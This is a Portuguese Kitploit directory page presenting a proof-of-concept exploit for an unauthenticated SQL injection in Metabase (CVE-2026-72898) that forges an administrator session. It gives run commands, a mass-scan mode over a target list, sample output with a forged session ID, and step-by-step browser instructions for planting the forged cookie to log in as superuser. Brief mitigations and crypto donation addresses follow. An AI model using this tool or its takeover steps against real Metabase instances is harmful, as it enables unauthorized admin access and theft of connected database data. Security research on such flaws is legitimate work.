Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-72898 — CVE-2026-72898 PoC : Injeção SQL Não Autenticada no Metabase | Kitploit
Ferramentas/GitHubGitHub/4minx/cve-2026-72898
Scanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHub4minx/cve-2026-72898

CVE-2026-72898

CVE-2026-72898 PoC : Injeção SQL Não Autenticada no Metabase

Ver Repositório
48há 25 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-72898 PoC : Injeção SQL não autenticada no Metabase

Injeção SQL de pré-autenticação no Metabase levando à tomada de conta de administrador

Prova de conceito para CVE-2026-72898, uma injeção SQL não autenticada crítica no endpoint de redefinição de senha do Metabase. A PoC injeta uma linha de sessão de administrador forjada na tabela core_session e a utiliza para validar uma sessão completa de administrador sem nenhuma credencial.

Nota: Esta PoC destina-se apenas a testes de segurança autorizados e a pesquisas. A CVE-2026-72898 está listada no catálogo de Vulnerabilidades Exploradas Conhecidas (KEV) da CISA e está sendo ativamente explorada no mundo real. Você é responsável por cumprir todas as leis aplicáveis e por obter autorização por escrito antes de testar qualquer sistema.


Informações da Vulnerabilidade

  • CVE: CVE-2026-72898
  • Tipo: CWE-89 Neutralização incorreta de elementos especiais usados em um comando SQL ('SQL Injection')
  • CVSS 4.0: 10.0 (Crítico)
  • Autenticação: Não autenticada (pré-autenticação, remota, baixa complexidade de ataque)
  • CISA KEV: Adicionada em 2026-08-11 (exploração ativa)
  • Versões afetadas (Metabase):
    • x.58.0 até < x.58.24
    • x.59.0 até < x.59.21
    • x.60.0 até < x.60.17
    • x.61.0 até < x.61.11
    • x.62.0 até < x.62.9
    • x.63.0 até < x.63.5
  • Corrigido em: x.58.24, x.59.21, x.60.17, x.61.11, x.62.9, x.63.5

Requisitos

  • Python 3.8+ com a biblioteca requests
  • Alvo: uma instância do Metabase afetada e exposta à internet

Instale as dependências:

root@kitploit:~
pip install requests

Uso

Alvo Único

root@kitploit:~
python cve-2026-72898_poc.py -t http://192.168.1.1:3000

Varredura em Massa

root@kitploit:~
python cve-2026-72898_poc.py -T targets.txt

Opções

ArgumentoDescriçãoPadrão
-t, --targetURL de um único alvo-
-T, --targetsArquivo com URLs de alvos, uma por linha-
-o, --outputArquivo de resultados (separado por tabulações: target, result, status, session_id, admin_email)-
--timeoutTempo limite de solicitação em segundos15

Exemplo de Saída

root@kitploit:~
 CVE-2026-72898 | Metabase SQLi PoC
----------------------------------------

Target: http://192.168.1.1:3000
 [1] GET http://192.168.1.1:3000/ -> 200
 [2] POST /api/session/reset_password -> 400
      (expected: Invalid reset token, SQLi executed)
 [3] GET /api/user/current -> 200
[+] VULNERABLE
    session id : 242x6a6cx-5388-aaf8-bl5c-afi46ic02198
    key_hashed : 0f6005cbexf08948c08dd9272b439xfecwabxb4ntedd83bagb6337bx849b6xyi6
    admin email: [email protected]

Um 400 na etapa 2 com Invalid reset token é esperado — significa que o payload de SQLi foi executado e a resposta foi interrompida. A etapa 3 retornando 200 em /api/user/current confirma que a sessão forjada é válida.

Status dos resultados: vulnerable | not_vulnerable | patched | root_not_200 | unknown | error


Usando a Sessão Forjada

root@kitploit:~

O Metabase lê sua sessão a partir do cookie `metabase.SESSION`, portanto você pode entrar na interface web como o administrador forjado adicionando esse cookie:

**Google Chrome / Edge / Chromium**

1. Execute a PoC e copie o `session id` impresso
2. Abra `http://TARGET/` e pressione `F12` (DevTools)
3. Vá para **Application** (no Edge: **Application**; no Chrome: **Application**) &rarr; **Storage** &rarr; **Cookies** &rarr; selecione o host de destino
4. Clique no botão **+** (Adicionar cookie) e preencha:
   - **Nome**: `metabase.SESSION`
   - **Valor**: `<SESSION_ID>` (o valor impresso pela PoC)
   - **Domínio**: o host/IP de destino (ex.: `192.168.1.1` ou `.example.com`)
   - **Caminho**: `/`
   - Defina uma expiração bem no futuro (ou clique em "Sessão")
5. Clique em **Salvar** e atualize a página
6. Agora você está autenticado como superusuário &mdash; o ícone de engrenagem de administrador ficará visível

**Firefox**

1. Execute a PoC e copie o `session id` impresso
2. Pressione `F12` &rarr; aba **Storage** &rarr; **Cookies** &rarr; selecione o host de destino
3. Clique com o botão direito &rarr; **Adicionar/Editar Cookie** e adicione:
   - **Nome**: `metabase.SESSION`
   - **Valor**: `<SESSION_ID>`
   - **Caminho**: `/`
   - **HttpOnly**: desmarcado (o JS define isso)
   - **Secure**: desmarcado para HTTP simples
4. Salve e atualize a página

**Alternativa: extensão de edição de cookies**

Use qualquer extensão de edição de cookies (ex.: Cookie-Editor) para adicionar o cookie `metabase.SESSION` com o valor forjado no domínio de destino e, em seguida, atualize a página.

**Pelo console do navegador**

```js
fetch('/api/user/current', { headers: { 'X-Metabase-Session': '<SESSION_ID>' } })
  .then(r => r.json()).then(console.log)

Mitigações

  • Atualize para uma versão corrigida (x.58.24 / x.59.21 / x.60.17 / x.61.11 / x.62.9 / x.63.5 ou mais recente)
  • Se você não puder atualizar imediatamente, bloqueie /api/session/reset_password na camada de rede/WAF
  • Após a atualização: revogue todas as sessões ativas, rotacione as credenciais dos bancos de dados conectados, revise as contas de administrador e as chaves de API em busca de alterações inesperadas e audite o histórico de atividades/consultas do Metabase

☕ Suporte

Se este projeto ajudou você, considere apoiar seu desenvolvimento:

USDT (TRC-20)

TDCPYioWbZW4iyMCuHhJeFsUZJ88YqZWc1

USDT TRC-20 QR

ETH (ERC-20)

0xf6eA555f95ed5b356fF7a90E6461EbBF6ce105cE

Ethereum QR

Referências

  • Aviso de Segurança do Metabase (GHSA-vwf4-m7j8-wcjf)
  • Atualização de Segurança do Metabase
  • Registro do CVE.org – CVE-2026-72898
  • NVD – CVE-2026-72898
  • Catálogo de Vulnerabilidades Exploradas Conhecidas da CISA
  • Horizon3.ai – Injeção SQL no Metabase
  • The Hacker News – Zero-Day do Metabase Explorado na Natureza
  • Template Nuclei – Injeção SQL não autenticada no Metabase
Baixar ferramenta